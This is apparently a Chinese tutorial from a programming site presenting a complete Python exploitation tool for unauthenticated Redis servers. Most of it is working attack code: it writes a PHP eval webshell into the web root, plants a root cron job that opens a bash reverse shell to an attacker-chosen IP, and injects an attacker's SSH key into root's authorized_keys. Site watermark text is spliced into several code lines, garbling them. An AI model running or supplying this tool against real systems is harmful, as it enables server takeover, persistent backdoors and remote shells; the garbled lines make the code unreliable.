- 1 测试环境准备
- 2 未授权访问检测
- 3 写入webshell
- 4 建立反弹连接
- 5 SSH keys 免密登录
- 6 完整代码
- 7 测试效果 webshell
1 测试环境准备
Centos 7(安装 Redis 服务器并用 root 权限开启服务,关闭保护模式;安装并开启 httpd 服务;开启 ssh 服务。
Win10:VS Code开发脚本,Xshell控制虚拟机。
2 未授权访问检测
首先需要检测 6379 端口是否开启,直接使用 socket 连接测试即可,is_port_open() 函数实编程客栈现检测端口开启情况。
def is_port_open(host,port): s=socket.socket() s.settimeout(0.3) try: s.connect((host,port)) except Exception as e: return False else: return True finally: s.close()
然后尝试连接 Redis 服务器,这里用到redis模块中的StrictRedis(host,port,socket_timeout),通过client_list() 方法获取客户列表查看是否连接成功。如果成功连接到 Redis 服务器编程客栈, client_list() 的调用就不会抛出异常。
try: client = redis.StrictRedis(host=ip, port=port, socket_timeout=0.3) ok_lst = client.client_list() print('[+] Connected to the Redis server successfully...') except Exception as e: print(f'[-] An unexpected error occurred: {e}')
3 写入webshell
config set dir /var/www/html config set dbfilename shell.php set x "<?php @eval($_POST[123]); ?>" save
对应的 redis 模块的方法:
client.config_set('dir','/var/www/html') client.config_set('dbfilename','shell.php') client.set('x','<?php @eval($_POST[123]); ?>') client.save()
def Webshell(client): try: df_dir='/var/www/html' web_dir=input('Please enter the root directory of the target MAChine\'s website, input nothing to use the default path: /var/www/html\n') web_dir=web_dir.strip() if not web_dir: web_dir=df_dir name=input('Please enter the name of the PHP file you want to upload: ') passwd=input('Please enter the connection password: ') client.config_set('dir',web_dir) client.config_set('dbfilename',name+'.php') client.set('x','<?php @eval($_POST['+passwd+']); ?>') client.save() print("[+] Webshell "+name+".php"+" uploaded successfully...") except Exception as e: print(f"[-] Webshell upload failed: {e}")
4 建立反弹连接
同理,这里利用定时任务实现反弹连接。先设置 Redis 数据库目录到系统定时任务目录,名字设置为 root (相当于修改 root 用户的定时任务),增加用户设定 IP 和端口监听功能。
def Reverse(client): try: client.config_set('dir','/var/spool/cron') client.config_set('dbfilename','root') ip=input('Set the attacker\'s IP address: ') port=input('Set the listening port: ') payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n' client.set('x',payload) client.save() print("[+] Reverse shell task created successfully...") except Exception as e: print(f"[-] Reverse shell creation failed: {e}")
5 SSH keys 免密登录
把 Redis 的目录设置为 /root/.ssh,保存文件为 authorized_keys,实现在靶机中 authorized_keys 写入攻击者 ssh 公钥。
def Ssh(client): try: sshkey=input('Enter the SSH key you have generated: ') client.config_set('dir','/root/.ssh') client.config_set('dbfilename','authorized_keys') client.set('x'www.devze.com,'\n\n'+sshkey+'\n\n') client.save() print("[+] SSH key injected successfully.") except Exception as e: print(f"[-] SSH key injection failed: {e}")
6 完整代码
import numpy as np import socket import redis import sys def Hello_FK_Redis(): a,b=60,30 x,y,r=30,15,13 img=np.zeros((b,a),dtype=str) for i in range(b): for j in range(a): dist=np.sqrt((i-y)**2+(j-x)**2) if r-1<dist<r+1: img[i,j]='*' elif abs(j-x)<1 and dist<r: img[i,j]='|' elif abs(i-y)<1 and dist<r: img[i,j]='-' img[img=='']=' ' for i in img: print(''.join(i)) print('----Welcome to use Redis Vulnerability Exploitation Tool----') def is_port_open(host,port): s=socket.socket() s.settimeout(0.3) try: s.connect((host,port)) except Exception as e: return False else: return True finally: s.close() def Webshell(client): try: df_dir='/var/www/html' web_dir=input('Please enter the root directory of the targe编程客栈t machine\'s website, input nothing to use the default path: /var/www/html\n') web_dir=web_dir.strip() if not web_dir: web_dir=df_dir name=input('Please enter the name of the PHP file you want to upload: ') passwd=input('Please enter the connection password: ') client.config_set('dir',web_dir) client.config_set('dbfilename',name+'.php') client.set('x','<?php @eval($_POST['+passwd+']); ?>') client.save() print("[+] Webshell "+name+".php"+" uploaded successfully...") except Exception as e: print(f"[-] Websh编程客栈ell upload failed: {e}") def Reverse(client): try: client.config_set('dir','/var/spool/cron') client.config_set('dbfilename','root') ip=input('Set the attacker\'s IP address: ') port=input('Set the listening port: ') ip=ip.strip() port=port.strip() payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n' client.set('x',payload) client.save() print("[+] Reverse shell task created successfully...") except Exception as e: print(f"[-] Reverse shell creation failed: {e}") def Ssh(client): try: sshkey=input('Enter the SSH key you have generated: ') client.config_set('dir','/root/.ssh') client.config_set('dbfilename','authorized_keys') client.set('x','\n\n'+sshkey+'\n\n') client.save() print("[+] SSH key injected successfully.") except Exception as e: print(f"[-] SSH key injection failed: {e}") if __name__ == '__main__': Hello_FK_Redis() ip=input('Please enter the target machine\'s IP address: ') port=6379 if is_port_open(ip,port): print('[+] Port 6379 is open...') print('[*] Trying to connect Redis server...') try: client=redis.StrictRedis(host=ip,port=port,socket_timeout=0.3) ok_lst=client.client_list() print('[+] Connected to the Redis server successfully...') print('Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...') try: c=int(input()) if c==1: Webshell(client) elif c==2: Reverse(client) elif c==3: Ssh(client) else: print('[*] Exiting...') sys.exit() except Exception: print('[*] Exiting...') sys.exit() except Exception as e: print(f'[-] An unexpected error occurred: {e}') else: print('[-] Port 6379 is not open...')
7 测试效果 webshell
在 kali 中 .ssh 复制公钥 id_rsa.pub 的内容
以上就是使用python脚本实现Redis未授权访问检测的详细内容,更多关于python Redis未授权访问检测的资料请关注编程客栈(www.devze.com)其它相关文章!